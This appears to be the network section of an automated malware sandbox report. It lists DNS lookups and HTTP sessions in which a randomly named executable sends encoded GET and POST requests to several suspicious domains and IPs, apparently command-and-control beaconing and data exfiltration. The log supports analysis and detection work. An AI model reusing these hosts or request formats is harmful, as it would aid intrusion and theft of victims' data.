Nov 19, 2024 03:56:48.389610052 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.389626980 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389659882 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389683008 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.389695883 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389729977 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389756918 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.389765024 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.389822006 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.394925117 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.394962072 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.394994974 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.395034075 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:48.402194023 CET | 80 | 49961 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:48.402261972 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:49.118383884 CET | 49961 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.136687040 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.141762972 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.141896009 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.155286074 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.160209894 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.916845083 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.916955948 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.916990042 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917026043 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917047024 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.917067051 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917117119 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.917125940 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917161942 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917177916 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.917201996 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917236090 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917262077 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.917272091 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.917329073 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.922667980 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.922703981 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.922739029 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.922765017 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.922775984 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.922838926 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:50.930291891 CET | 80 | 49973 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:50.930366993 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:51.665144920 CET | 49973 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:52.683342934 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:52.688389063 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.688481092 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:52.700404882 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:52.705466986 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705501080 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705555916 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705585957 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705637932 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705666065 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705694914 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705760956 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:52.705790043 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471395969 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471466064 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471503973 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471522093 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.471539974 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471579075 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471594095 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.471724987 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471760035 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471769094 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.471813917 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.471879959 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.472039938 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.472073078 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.472121000 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.476603031 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.476643085 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.476679087 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.476695061 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.476716042 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.476764917 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:53.484860897 CET | 80 | 49985 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:53.484924078 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:54.212269068 CET | 49985 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:55.230694056 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:55.235590935 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:55.235702038 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:55.242980957 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:55.247910023 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011625051 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011704922 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011743069 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011765957 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.011780024 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011816025 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011848927 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011881113 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.011890888 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011907101 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.011926889 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011957884 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.011971951 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.011995077 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.012042999 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.017157078 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.017214060 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.017256021 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.017275095 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.017292023 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.017333984 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.017415047 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.024879932 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:56:56.025158882 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.026058912 CET | 49997 | 80 | 192.168.2.4 | 203.161.46.205
Nov 19, 2024 03:56:56.031351089 CET | 80 | 49997 | 203.161.46.205 | 192.168.2.4
Nov 19, 2024 03:57:01.265948057 CET | 50016 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:01.271006107 CET | 80 | 50016 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:01.271212101 CET | 50016 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:01.284641027 CET | 50016 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:01.289735079 CET | 80 | 50016 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:02.790158033 CET | 50016 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:02.796082973 CET | 80 | 50016 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:02.796185970 CET | 50016 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:03.838555098 CET | 50017 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:03.843786001 CET | 80 | 50017 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:03.843873024 CET | 50017 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:03.862509012 CET | 50017 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:03.867669106 CET | 80 | 50017 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:04.996793985 CET | 80 | 50017 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:04.996898890 CET | 50017 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:05.368311882 CET | 50017 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:05.373461962 CET | 80 | 50017 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.386846066 CET | 50018 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:06.392020941 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.392118931 CET | 50018 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:06.409358025 CET | 50018 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:06.414356947 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414421082 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414509058 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414541006 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414570093 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414624929 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414654016 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414684057 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:06.414712906 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:07.534674883 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:07.534811020 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:07.534888983 CET | 50018 | 80 | 192.168.2.4 | 91.226.30.3
Nov 19, 2024 03:57:07.783540010 CET | 80 | 50018 | 91.226.30.3 | 192.168.2.4
Nov 19, 2024 03:57:07.783727884 CET | 50018 | 80 | 192.168.2.4 | 91.226.30.3
                                                  Nov 19, 2024 03:57:07.915247917 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.933742046 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.938788891 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:08.938864946 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.949137926 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.954013109 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:10.092542887 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:10.092669010 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:10.093584061 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:10.098436117 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:15.153678894 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.158621073 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:15.158694029 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.172544956 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.177493095 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067656040 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067678928 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067744017 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:16.071116924 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.071167946 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:16.680854082 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.709661961 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.714771986 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:17.714891911 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.729649067 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.734500885 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626359940 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626379013 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626444101 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:18.627831936 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.627876997 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:19.634103060 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.652458906 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.658215046 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.658313990 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.672945023 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.677867889 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677877903 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677920103 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677934885 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678020000 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678029060 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678033113 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678045034 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678049088 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584063053 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584112883 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584196091 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:21.586263895 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.586340904 CET5002280192.168.2.4104.21.15.100
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 03:56:16.238821030 CET | 55496 | 53 | 192.168.2.4 | 1.1.1.1
Nov 19, 2024 03:56:16.275840044 CET | 53 | 55496 | 1.1.1.1 | 192.168.2.4
Nov 19, 2024 03:56:32.638467073 CET | 53161 | 53 | 192.168.2.4 | 1.1.1.1
Nov 19, 2024 03:56:32.666285992 CET | 53 | 53161 | 1.1.1.1 | 192.168.2.4
Nov 19, 2024 03:56:47.027966022 CET | 55379 | 53 | 192.168.2.4 | 1.1.1.1
Nov 19, 2024 03:56:47.587869883 CET | 53 | 55379 | 1.1.1.1 | 192.168.2.4
Nov 19, 2024 03:57:01.042840958 CET | 62166 | 53 | 192.168.2.4 | 1.1.1.1
Nov 19, 2024 03:57:01.262706041 CET | 53 | 62166 | 1.1.1.1 | 192.168.2.4
Nov 19, 2024 03:57:15.106306076 CET | 51999 | 53 | 192.168.2.4 | 1.1.1.1
Nov 19, 2024 03:57:15.151463985 CET | 53 | 51999 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 03:56:16.238821030 CET | 192.168.2.4 | 1.1.1.1 | 0x507f | Standard query (0) | www.tempatmudisini06.click | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:56:32.638467073 CET | 192.168.2.4 | 1.1.1.1 | 0x76cc | Standard query (0) | www.carsten.studio | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:56:47.027966022 CET | 192.168.2.4 | 1.1.1.1 | 0xcf31 | Standard query (0) | www.moumore.top | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:57:01.042840958 CET | 192.168.2.4 | 1.1.1.1 | 0xef13 | Standard query (0) | www.vpnto.net | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:57:15.106306076 CET | 192.168.2.4 | 1.1.1.1 | 0x42e5 | Standard query (0) | www.sitioseguro.blog | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 03:56:16.275840044 CET | 1.1.1.1 | 192.168.2.4 | 0x507f | No error (0) | www.tempatmudisini06.click | tempatmudisini06.click | | CNAME (Canonical name) | IN (0x0001) | false
Nov 19, 2024 03:56:16.275840044 CET | 1.1.1.1 | 192.168.2.4 | 0x507f | No error (0) | tempatmudisini06.click | | 103.21.221.4 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:56:32.666285992 CET | 1.1.1.1 | 192.168.2.4 | 0x76cc | No error (0) | www.carsten.studio | carsten.studio | | CNAME (Canonical name) | IN (0x0001) | false
Nov 19, 2024 03:56:32.666285992 CET | 1.1.1.1 | 192.168.2.4 | 0x76cc | No error (0) | carsten.studio | | 217.160.0.200 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:56:47.587869883 CET | 1.1.1.1 | 192.168.2.4 | 0xcf31 | No error (0) | www.moumore.top | | 203.161.46.205 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:57:01.262706041 CET | 1.1.1.1 | 192.168.2.4 | 0xef13 | No error (0) | www.vpnto.net | | 91.226.30.3 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:57:15.151463985 CET | 1.1.1.1 | 192.168.2.4 | 0x42e5 | No error (0) | www.sitioseguro.blog | | 104.21.15.100 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 03:57:15.151463985 CET | 1.1.1.1 | 192.168.2.4 | 0x42e5 | No error (0) | www.sitioseguro.blog | | 172.67.162.39 | A (IP address) | IN (0x0001) | false
                                                  • www.tempatmudisini06.click
                                                  • www.carsten.studio
                                                  • www.moumore.top
                                                  • www.vpnto.net
                                                  • www.sitioseguro.blog
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49815 | 103.21.221.4 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:16.294245005 CET | 472 | OUT | GET /5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= HTTP/1.1
Host: www.tempatmudisini06.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Nov 19, 2024 03:56:17.406595945 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Tue, 19 Nov 2024 02:56:17 GMT
server: LiteSpeed
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49890 | 217.160.0.200 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:32.816982985 CET | 730 | OUT | POST /bdk6/ HTTP/1.1
Host: www.carsten.studio
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: close
Content-Length: 205
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Origin: http://www.carsten.studio
Referer: http://www.carsten.studio/bdk6/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 5a 46 4b 42 70 61 6a 66 62 30 32 46 2f 50 2b 6b 54 6b 53 74 44 55 45 44 4a 33 51 61 44 6b 2f 47 54 50 32 6f 38 76 36 33 66 45 34 64 33 56 42 65 77 67 36 59 4c 54 77 36 36 52 44 44 54 38 76 78 78 72 6d 45 74 75 65 4e 5a 65 2f 50 6d 46 76 4c 66 50 52 34 33 38 63 67 46 79 77 78 36 69 70 4d 50 38 50 32 33 63 71 4e 34 70 75 4e 46 50 78 31 42 65 34 48 55 70 70 73 70 68 36 61 57 70 71 4a 33 53 4a 41 36 72 4b 51 61 4e 51 66 69 6e 5a 63 57 4c 54 30 70 54 68 2b 47 59 31 31 4c 5a 51 42 34 59 4b 69 4d 49 70 58 47 6a 32 2b 63 6b 61 59 62 69 63 71 4f 51 3d 3d
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JZFKBpajfb02F/P+kTkStDUEDJ3QaDk/GTP2o8v63fE4d3VBewg6YLTw66RDDT8vxxrmEtueNZe/PmFvLfPR438cgFywx6ipMP8P23cqN4puNFPx1Be4HUppsph6aWpqJ3SJA6rKQaNQfinZcWLT0pTh+GY11LZQB4YKiMIpXGj2+ckaYbicqOQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49903 | 217.160.0.200 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:56:35.374742031 CET | 750 | OUT | POST /bdk6/ HTTP/1.1
Host: www.carsten.studio
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: close
Content-Length: 225
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Origin: http://www.carsten.studio
Referer: http://www.carsten.studio/bdk6/
